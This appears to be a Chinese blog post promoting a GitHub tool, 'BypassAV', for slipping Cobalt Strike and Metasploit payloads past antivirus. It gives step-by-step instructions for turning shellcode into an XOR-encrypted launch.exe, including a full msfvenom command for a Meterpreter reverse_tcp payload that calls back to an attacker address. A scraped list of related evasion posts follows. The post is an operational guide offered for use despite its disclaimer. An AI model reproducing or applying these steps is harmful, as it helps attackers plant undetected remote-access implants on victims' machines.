Cobalt Strike 和 MSF 免杀上线
一、项目
老哥们,方便的话,给个star吧!
BypassAV
VT查杀效果良好!!!
大家可以去github上 git下来使用,这里就介绍下具体使用
二、操作
2.1 CS 上线
1、生成 C 语言格式的payload payload.c
(使用前,最好先测试下生成的payload是否可用!这里推荐k8gege的shellcodeLoader工具)
坑:选择 x64 经常无法上线!!!
2、利用 Filehandle.py 处理 shellcode
替换自己的shellcode文件路径——>执行即可
3、替换 ver.py 里的shellcode变量值 为 第2步的结果
4、执行 ver.py 文件 在 output 目录下会有个launch.exe文件
2.2 MSF上线
1、生成 py格式的payload
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.47.147 lport=4444 -b '\x00' -f python -o payload.py
2、利用 Filehandle.py 处理 shellcode
替换自己的shellcode文件路径——>执行即可
。。。步骤与CS上线一样
三、补充
ver.py 里的 两个 key 是 异或加密密钥,自己也可以更改!
【申明:此项目仅供学习参考,不可用于非法途径,否则一切后果,由恶意使用者个人承担!】
Cobalt Strike 和 MSF 免杀上线相关推荐
- 162.网络安全渗透测试—[Cobalt Strike系列]—[Veil免杀]
文章目录 1 Veil的使用 2 生成有效载荷payload 3 Veil免杀过程 4 测试免杀 1 Veil的使用 (1)Veil主要用于生成:免杀payload (2)下载地址:https://g ...
- 使用powershell免杀上线CS的新方式---利用图片
文章目录 利用工具 模拟上线 总结 参考文章 利用工具 Invoke-PSImage 任意一张图片 模拟上线 1.使用cs生成一个powershell的payload. 2.执行工具脚本并保存生成的上 ...
- (记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)
1.首先cs生成一个64位的Python Payload 2.截取其中的Payload,并进行base64编码. 3.把这一串子base64放到VPS上.并开启web服务. python3 -m ht ...
- Powershell 过火绒免杀上线
payload生成 原生payload生成后被无情秒杀 powershell免杀制作 打开powershell命令行,将payload编码 1.新建一个变量h,用来接收之后编码的payload $h= ...
- [技术分享]利用MSBuild制作msf免杀的后门
文章github上有公开现成的shellcode,这就是shellcode 我这次选择了32位的那个版本来进行演示 需要改写的是shellcode那部分: 选择CobaltStrike:payload ...
- Cobalt Strike 注入msf会话
目录 (一)环境准备 1.启动服务端 2.启动客户端 3.一个在msf拿到权限的靶机 (二) 配置msf创建监听 1.使用msf创建后门 2.使用python创建一个web服务,然后使用靶机下载 3. ...
- Malware Dev 01 - 免杀之 PPID Spoofing 原理解析
写在最前 如果你是信息安全爱好者,如果你想考一些证书来提升自己的能力,那么欢迎大家来我的 Discord 频道 Northern Bay.邀请链接在这里: https://discord.gg/9Xv ...
- msf rhosts设置文件_聊一聊基于 msf 的免杀项目测试过程
本文作者:ven0m(信安之路红蓝对抗小组成员) 招新文章:信安之路红蓝对抗小组招募志同道合的朋友 我们在渗透中,需要解决的两个主要问题,一个是过安全检测设备(俗称过 WAF),一个是过杀毒软件(免杀 ...
- MSF后门生成及免杀思想
MSF后门生成及免杀思想 免杀概念 杀毒软件检测方式 杀毒软件主动防御 免杀技术介绍 修改特征码 花指令免杀 内存免杀 加壳免杀 二次编译 资源修改 MSF常用命令 常见的木马生成 常见后门生成方式 ...
- msf之进阶免杀技术,无视360
大家好!我是阿杰,今天我写一篇关于msf免杀技术的文章,如果你喜欢请为我打call,我会一直写下去. 首先我们需要: 说明:python监听虽然可以绕过360,但仅限于安装了python的目标,这是具 ...
最新文章
- 使用Oauth2实现微服务的安全保护
- .so文件反编译_o泡果奶软件在哪下载 o泡果奶一份礼物魔性文件下载
- 关于collect2: cannot find ld的解决办法
- 如何将exe文件在linux下执行,如何轻松的在Linux中运行Windows的.exe文件
- ListView控件数据操作——通过代码在窗体上添加控件
- RSAC2020的PPT下载
- 电压、电流检测方法介绍
- 南阳oj 括号配对问题
- 怎么使用outlook发送邮件?outlook群发邮件怎么撤回?
- [转载]做数学是倒过来的(林群)
- GalaxyOJ-636 (概率DP)
- hyperv怎么复制文件到linux,Hyper-V快速复制虚拟机
- Knowledge-aware Graph Neural Networks with Label Smoothness Regularization for Recommender Systems
- python,根据tkinter计数器案例,写了个倒计时器
- 高边坡监测主要监测的内容
- 金蝶服务器响应异常,金蝶提示连接金蝶云服务器异常
- 运营商做互联网产品的十种死法
- 吃球球C++ 配合easyX
- python画三瓣树叶_用Python能画哪些树?
- LEADTOOLS V22.0 Patch